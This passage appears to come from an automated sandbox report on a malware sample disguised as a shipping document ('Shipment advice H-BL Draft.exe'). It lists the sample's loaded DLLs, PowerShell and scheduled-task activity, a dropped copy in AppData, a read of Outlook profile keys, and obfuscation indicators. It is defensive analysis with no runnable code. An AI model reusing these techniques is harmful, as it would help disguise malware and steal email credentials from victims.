Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Shipment advice H-BL Draft.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Shipment advice H-BL Draft.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.cs .Net Code: pjllxlRJ8W System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_016E5E00 pushad ; iretd 0_2_016E5E09
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07C60962 push DC05D175h; retf 0175h 0_2_07C60A15
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07CC06F0 push esp; retf 07BAh 0_2_07CC06FD
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07CC22F8 push eax; retf 0_2_07CC2315
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280891E pushad ; iretd 13_2_0280891F
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_02808C2F pushfd ; iretd 13_2_02808C30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_02808DDF push esp; iretd 13_2_02808DE0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06698909 push es; ret 13_2_06698920
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 14_2_07781520 push eax; retf 14_2_0778153D
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 14_2_0778043B push esp; retf 05A7h 14_2_07780445
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148891E pushad ; iretd 18_2_0148891F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_01488DDF push esp; iretd 18_2_01488DE0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_01488C2F pushfd ; iretd 18_2_01488C30
                    Source: Shipment advice H-BL Draft.exe Static PE information: section name: .text entropy: 7.8833215409501465
                    Source: PrcGlGVKeUCXxg.exe.0.dr Static PE information: section name: .text entropy: 7.8833215409501465
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, ixWiGNeOm65DW7eSpN.cs High entropy of concatenated method names: 'hjGRsGPqCl', 'owuRHLjDpF', 'q1ZZyFmTWm', 'J4qZhCMx0V', 'MB9Z6B6aMY', 'gK6ZIVSYhX', 'ebYZNdOawB', 'qVnZGiEFKc', 'Ql0ZJjnKMn', 'C7qZn2G4P7'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, GOqrpMYiJDTShMREFi.cs High entropy of concatenated method names: 'qWdTU8m9Pt', 'vRmTuBu4G9', 'VROTyGOIqk', 'EaNThLvYyh', 'jEOT61SyYh', 'w2eTIZnbx2', 'Tc8TN9m8qZ', 'WMhTGlNKCx', 'LauTJliqrv', 'Ai0TnSyri1'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, gdNVcxURmsH25ySadH.cs High entropy of concatenated method names: 'PWxWt23bKr', 'FunWQYXeJM', 'bnhWR5MNrI', 'x8KWje1VSX', 'w4nWgUB5Zs', 'agsRLDyHIg', 'DIoR8dDgR3', 'zE2R4mwOBm', 'THcRBcbTxK', 'ySURYbtT5w'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, wZgc7i4q9brRT2pZKI.cs High entropy of concatenated method names: 'whYTwtu4NS', 'MWCTKxljOC', 'RRoTTVTqjP', 'lIkTbkxjWR', 'O9DTqJLgjH', 'tg0TdYIaOG', 'Dispose', 'jObfSASnib', 'zfDfQcbTi0', 'qNlfZFSLmV'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, ulbq95Xlxcu8p7KeyGb.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HtQATCLh4b', 'FfVA3ZKo91', 'QF6Abf45d6', 'PmbAA0F170', 'G2KAq2JLWs', 'KdgA0Hhbvu', 'vXXAdg2uNY'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, KsMRxFrdbDbyaIENQ5.cs High entropy of concatenated method names: 'xNyZ2pbc1C', 'o1LZcxyWqS', 'S2lZOfwDKu', 'hcIZrxJ7OJ', 'H7fZw2IuBl', 'OL1Z9tHivG', 'oQ7ZKv2qkn', 'b0GZfdT4QZ', 'Mq4ZTOp8s6', 'nI6Z3bPd88'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, naUIUlEG66hMKkCVK1.cs High entropy of concatenated method names: 'ToString', 'ivI91pyCPu', 'rNf9uGow5O', 'Dne9yc9uZn', 'c1m9hB9EmD', 'xow96hUy2Y', 'hWS9I2v6yn', 'Stj9NAamw9', 'atT9Gs0rrs', 'nOi9JIa7FV'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, isFMQ2CQg9EPtseEDq.cs High entropy of concatenated method names: 'yrAx8BenU', 'Gpq2tohR5', 'PiocPggTl', 'Uk6HCswlN', 'kMvrQx8B9', 'horeerTZO', 'Wd7wRINv9PtEmPgGiq', 'cUtHHY1lpVZgynQ2xi', 'Ky1fLTMoi', 'iUA3JiVDq'
